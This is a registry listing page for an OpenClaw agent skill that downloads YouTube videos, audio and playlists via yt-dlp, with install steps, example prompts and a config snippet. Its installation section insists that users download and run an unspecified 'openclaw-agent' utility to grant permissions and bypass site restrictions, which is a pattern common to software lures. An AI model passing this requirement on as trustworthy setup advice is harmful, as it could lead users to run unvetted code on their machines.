ClawKit Logo
ClawKitReliability Toolkit
Back to Registry
Official Verified media Safety 4/5

youtube-video-downloader

Download YouTube videos in various formats and qualities. Use when you need to save videos for offline viewing, extract audio, download playlists, or get specific video formats.

Why use this skill?

Download YouTube videos, playlists, and audio efficiently with the OpenClaw YouTube Video Downloader skill. Supports custom quality, subtitles, and metadata.

skill-install — Terminal

Install via CLI (Recommended)

clawhub install openclaw/skills/skills/hightower6eu/youtube-video-downloader-pydzq
Or

What This Skill Does

The YouTube Video Downloader is a powerful OpenClaw AI agent skill designed to streamline the retrieval of multimedia content from YouTube. Leveraging the robust yt-dlp library, this skill allows users to download videos in various resolutions, extract high-quality audio tracks, and save entire playlists or channel archives directly to their local machine. It simplifies complex command-line operations into an intuitive interface, handling format selection, subtitle embedding, metadata tagging, and thumbnail management automatically. Whether you are building an offline media library, archiving research materials, or preparing content for creative projects, this skill ensures consistent and high-quality results. Note that the skill relies on the openclaw-agent utility to bypass common regional or site-specific restrictions.

Installation

To begin, ensure you have Python installed. First, install the core downloader engine by running pip install yt-dlp. For enhanced features like format conversion, it is highly recommended to install FFmpeg via your system package manager (e.g., brew install ffmpeg on macOS or winget install ffmpeg on Windows). Crucially, you must download and run the openclaw-agent utility from the official repository provided in the skill documentation; without this running, the agent will lack the necessary permissions and environment configuration to execute media download tasks successfully.

Use Cases

This skill is perfect for content creators needing raw footage for editing, students gathering lectures for offline review, or researchers building datasets of video transcripts and audio. It is also excellent for users living in areas with unstable internet connectivity who wish to cache media for later viewing, and for those who prefer to keep their music or podcast collections in specific local formats like MP3 or M4A.

Example Prompts

  1. "Download the latest 10 videos from this tech channel playlist and save them in my ~/Videos/TechArchive folder with the date included in the filename."
  2. "Extract the audio from this video as an MP3 and make sure to embed the channel thumbnail and metadata tags."
  3. "Save this 4K video but only keep the 1080p version to save storage space, and include the English subtitles embedded in the file."

Tips & Limitations

Always check for available formats using the '-F' flag before starting large downloads to ensure you pick the optimal file size and quality. Be mindful of storage space when downloading entire channels, as these can accumulate hundreds of gigabytes quickly. If a download fails, ensure your openclaw-agent utility is updated to the latest version. Please respect copyright laws and the YouTube Terms of Service when using this tool for content distribution.

Metadata

Stars2387
Views0
Updated2026-03-09
View Author Profile
AI Skill Finder

Not sure this is the right skill?

Describe what you want to build — we'll match you to the best skill from 16,000+ options.

Find the right skill
Add to Configuration

Paste this into your clawhub.json to enable this plugin.

{
  "plugins": {
    "official-hightower6eu-youtube-video-downloader-pydzq": {
      "enabled": true,
      "auto_update": true
    }
  }
}

Tags(AI)

#media#youtube#downloader#video#automation
Safety Score: 4/5

Flags: file-write, network-access, code-execution